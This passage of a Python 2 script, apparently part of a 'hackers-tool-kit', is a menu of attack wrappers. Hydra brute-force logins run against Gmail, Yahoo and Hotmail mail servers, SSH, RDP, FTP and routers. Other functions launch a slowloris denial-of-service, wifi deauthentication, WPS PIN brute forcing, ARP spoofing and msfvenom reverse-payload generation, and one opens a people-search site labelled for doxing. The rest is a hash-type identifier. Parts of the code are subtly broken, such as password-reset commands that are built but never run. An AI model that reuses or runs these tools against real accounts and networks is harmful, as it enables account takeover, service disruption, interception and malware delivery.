Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + 